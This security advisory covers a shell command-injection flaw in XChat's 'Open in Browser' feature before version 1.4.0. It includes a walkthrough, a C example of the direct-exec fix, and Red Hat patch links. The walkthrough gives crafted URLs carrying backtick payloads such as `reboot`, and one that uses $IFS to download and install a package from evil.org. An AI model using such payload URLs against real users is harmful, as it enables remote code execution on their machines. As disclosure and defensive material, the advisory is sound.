XChat allows users to right-click on a URL that appears in an IRC discussion and select "Open in Browser." To open the URL in a browser, XChat passes it to /bin/sh, so a malicious URL can execute arbitrary shell commands as the user running XChat. A patch for RedHat systems changes XChat to bypass the shell and execute the browser directly.
Credit:
The information has been provided by zenith parsec.
Vulnerable systems:
Version prior to XChat 1.4.0
Immune systems:
XChat 1.4.0
Hack walkthrough:
Imagine that someone types in an IRC channel:
l00k @ d15 k3w1 w@r3z 5173! http://www.altavista.com/?x=`date`y='`date`'
With the 'Existing' or 'New Window' browser options, which start the browser with an 'openURL(%s)'-style command, the shell receives:
netscape -remote 'openURL(http://www.altavista.com/?x=`date`y='`date`')'
Count the single quotes: the ' immediately before the second `date` closes the quoted string and the one after it reopens it, so the second `date` is no longer inside quotes and the shell executes it.
With the 'Run New' type commands (that is, command %s with no 's around the %s) you get:
netscape http://www.altavista.com/?x=`date`y='`date`'
Here the first `date` is unquoted (no 's around it), so it executes. In real life, though, it is unlikely anyone would click on a URL like
http://`reboot`/'`reboot`'
But URLs can get pretty long. For example, a cgi-bin call to something can get quite long:
http://www.altavista.com/cgi-bin/query?pg=q&stype=stext&Translate=on&sc=on&q=%2bxchat+%2bbacktick+%2bexploit&stq=10
Compare that to:
http://www.altavista.com/cgi-bin/query?pg=q&stype=stext&Translate=on&sc=on&q=%2bxchat+%2b`reboot`+%2bexploit&stq=10&filter='`reboot`'&user=b0dee0132&split=1
An attacker can even build full commands, using $IFS (assuming it's defined) for spaces (since spaces cannot be included in the URL):
http://www.altavista.com/?'"`rpm${IFS}-i${IFS}http://evil.org/evil.rpm`"'
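The following C program is an added example, not XChat's code or the RedHat patch. It reproduces the two command lines from the walkthrough by substituting the URL into a '%s' template (without running them), flags URLs that carry shell metacharacters as a detection aid, and shows the fix the advisory describes: starting the browser with fork()/execvp() and the URL as one argv element, so /bin/sh never sees it. The metacharacter set, the use of /bin/echo as a stand-in browser, and the function names are assumptions of this example.

```c
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/wait.h>

/* Characters that let URL text escape its quoting or be interpreted by
 * /bin/sh: backtick and $ (command/parameter substitution), the quote
 * characters and backslash (quoting), and the command separators and
 * redirections. This set is an assumption for the example; the advisory
 * itself only shows backtick, ' and $IFS. */
static const char SHELL_META[] = "`$'\"\\;|&<>()\n";

/* Detection aid: 1 if the URL contains any shell metacharacter, else 0.
 * '&' is in the set, so most query-string URLs will trip it; that is
 * exactly why filtering is not a substitute for avoiding the shell. */
int url_has_shell_metachar(const char *url)
{
    return url[strcspn(url, SHELL_META)] != '\0';
}

/* The vulnerable pattern from the advisory: substitute the URL into the
 * user's command template ("netscape -remote 'openURL(%s)'") and hand the
 * result to /bin/sh. This helper only builds the string so the reader can
 * see what the shell would receive; it never executes it. Returns 0 on
 * success, -1 if the template has no %s or the buffer is too small. */
int build_shell_command(char *out, size_t outlen, const char *tmpl, const char *url)
{
    const char *pos = strstr(tmpl, "%s");
    if (pos == NULL)
        return -1;
    int n = snprintf(out, outlen, "%.*s%s%s", (int)(pos - tmpl), tmpl, url, pos + 2);
    return (n < 0 || (size_t)n >= outlen) ? -1 : 0;
}

/* The fix the RedHat patch describes: bypass /bin/sh and execute the browser
 * directly, passing the URL as a single argv element. execvp() does not
 * tokenise argv, so backticks, quotes and $IFS in the URL are inert.
 * Returns the child's exit status (127 if the browser could not be
 * executed), or -1 on fork/wait failure. A real client would not block
 * on waitpid() while the browser runs. */
int launch_browser_direct(const char *browser, const char *url)
{
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        char *const argv[] = { (char *)browser, (char *)url, NULL };
        execvp(browser, argv);
        _exit(127);  /* exec failed; do not fall back to a shell */
    }
    int status = 0;
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void)
{
    /* Constructed input: the URL from the advisory's walkthrough. */
    const char *url = "http://www.altavista.com/?x=`date`y='`date`'";
    char cmd[512];

    if (build_shell_command(cmd, sizeof cmd, "netscape -remote 'openURL(%s)'", url) == 0)
        printf("shell would receive: %s\n", cmd);
    printf("metacharacters present: %d\n", url_has_shell_metachar(url));

    /* /bin/echo stands in for the browser here (assumption); the URL comes
     * back out unchanged, backticks and all, because no shell saw it. */
    return launch_browser_direct("/bin/echo", url) == 0 ? 0 : 1;
}
```

The metacharacter check is worth logging, but the only robust fix is the one in launch_browser_direct(): once the URL travels as an argv element rather than as part of a shell command line, there is no quoting to break out of and nothing to escape.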
Patch:
Red Hat Linux 6.2:
sparc:
ftp://updates.redhat.com/6.2/sparc/xchat-1.4.0-2.sparc.rpm
alpha:
ftp://updates.redhat.com/6.2/alpha/xchat-1.4.0-2.alpha.rpm
i386:
ftp://updates.redhat.com/6.2/i386/xchat-1.4.0-2.i386.rpm
sources:
ftp://updates.redhat.com/6.2/SRPMS/xchat-1.4.0-2.src.rpm